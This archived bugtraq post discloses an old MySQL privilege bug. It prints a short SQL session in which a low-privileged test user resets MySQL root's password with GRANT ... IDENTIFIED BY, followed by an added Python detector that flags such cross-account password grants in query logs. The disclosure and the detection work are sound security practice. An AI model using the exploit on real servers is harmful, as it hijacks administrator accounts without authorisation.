Hi. As I posted to bugtraq a few weeks ago, I discovered a serious bug in MySQL's password handling, affecting versions 3.22.29 and earlier, and 3.23.8 and earlier. As promised in that post, I now post an exploit, since all serious admins should have upgraded by now, especially with the password-checking bug found recently by Robert van der Meulen.

Note that the bug which the code in this post exploits is fixed in 3.22.30 and later, as well as 3.23.10 and later. No current MySQL is vulnerable to this exploit.

The old problem was simply that any user could alter any password in the system using the GRANT statement.

Exploit:

Connect to mysql as any user with grant privileges for any table. The default test users will do nicely. If no database has been created for the test user, do so. Then alter root's (MySQL's root's, not the real root's!) password with a GRANT. After the code below has been executed, the password of the MySQL superuser 'root' will be 'newpassword'.

    > mysql -utest -p
    Password:
    mysql> CREATE DATABASE test_expl;
    Query OK, 1 row affected (0.04 sec)
    mysql> GRANT select ON test_expl.* TO root@localhost IDENTIFIED BY 'newpassword';
    Query OK, 0 rows affected (0.01 sec)
    mysql> exit
    Bye

The problem was quickly fixed, and I got a good response from the people at TCX Datakonsult AB (thanks Monty!). I warmly recommend MySQL to anyone.

This message is not CC'ed to the mysql-list, as an exploit has already been posted there.

/Viktor...

--| Viktor Fougstedt, system administrator at dtek.chalmers.se |--
--| http://www.dtek.chalmers.se/~viktor/ |--
--| ...soon we'll be sliding down the razor blade of life. /Tom Lehrer |--
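The abuse described in the post leaves a clear trace on the server side: a GRANT ... IDENTIFIED BY statement issued by one account but naming a different account as its target. The following detection script is an added example, not part of Viktor's message or of MySQL itself. It scans MySQL general query log text in the classic "date time thread-id command argument" layout (the exact layout is an assumption here), tracks which account each connection thread belongs to, and flags cross-account password-setting grants. The log lines are constructed for the example; the one flagged finding mirrors the session shown in the post, while a grant issued by root is suppressed via the trusted_issuers parameter, which is this script's own, assumed name.

```python
import re

# Constructed sample of MySQL general query log lines for this example
# (not captured from a real server). Thread 3 is the "test" user from the
# post re-setting root's password; thread 4 is root doing ordinary admin work.
SAMPLE_LOG = """\
000131 10:02:11       3 Connect   test@localhost on test_expl
000131 10:02:12       3 Query     CREATE DATABASE test_expl
000131 10:02:40       3 Query     GRANT select ON test_expl.* TO root@localhost IDENTIFIED BY 'newpassword'
000131 10:03:05       4 Connect   root@localhost on mysql
000131 10:03:09       4 Query     GRANT ALL ON shop.* TO shopadmin@localhost IDENTIFIED BY 'x'
000131 10:03:30       3 Query     GRANT select ON test_expl.* TO test@localhost IDENTIFIED BY 'mine'
000131 10:03:50       3 Quit
"""

# Assumed general-log line layout: YYMMDD HH:MM:SS <thread id> <command> <argument>
LINE_RE = re.compile(
    r"^\d{6}\s+\d{2}:\d{2}:\d{2}\s+(?P<tid>\d+)\s+(?P<cmd>\w+)\s*(?P<arg>.*)$"
)
# "Connect" argument starts with user@host
CONNECT_RE = re.compile(r"^(?P<user>[^@\s]+)@(?P<host>\S+)")
# GRANT ... TO <user>[@host] IDENTIFIED BY ...  (user may be quoted)
GRANT_RE = re.compile(
    r"^\s*GRANT\b.*?\bTO\s+['`\"]?(?P<target>[^'`\"@\s]+)['`\"]?(?:@\S+)?"
    r"\s+IDENTIFIED\s+BY\b",
    re.IGNORECASE,
)


def find_cross_account_password_grants(log_text, trusted_issuers=("root",)):
    """Return GRANT ... IDENTIFIED BY statements whose target account differs
    from the account that issued them, ignoring issuers listed as trusted.

    Each finding is a dict with the thread id, issuing user, target user and
    the raw statement, so it can be fed to whatever alerting is in place."""
    issuer_by_thread = {}  # thread id -> user name of the connected account
    findings = []
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # continuation lines of multi-line queries are skipped
        tid, cmd, arg = m.group("tid"), m.group("cmd"), m.group("arg")
        if cmd == "Connect":
            c = CONNECT_RE.match(arg)
            if c:
                issuer_by_thread[tid] = c.group("user")
        elif cmd == "Quit":
            issuer_by_thread.pop(tid, None)
        elif cmd == "Query":
            g = GRANT_RE.match(arg)
            if not g:
                continue
            issuer = issuer_by_thread.get(tid, "<unknown>")
            target = g.group("target")
            # A user setting their own password via GRANT is not the pattern
            # of interest; neither is a trusted administrator account.
            if issuer in trusted_issuers or target == issuer:
                continue
            findings.append(
                {"thread": tid, "issuer": issuer, "target": target, "statement": arg}
            )
    return findings


if __name__ == "__main__":
    for f in find_cross_account_password_grants(SAMPLE_LOG):
        print(f"thread {f['thread']}: '{f['issuer']}' set password of "
              f"'{f['target']}' via: {f['statement']}")
```

Run against the constructed sample it reports one finding, thread 3's grant from test to root. Pass an empty trusted_issuers tuple to see every cross-account password grant, including root's; on a server that predates the fix, any such grant from a non-administrative account is the signal that the bug from the post has been used.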
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:34:40 PDT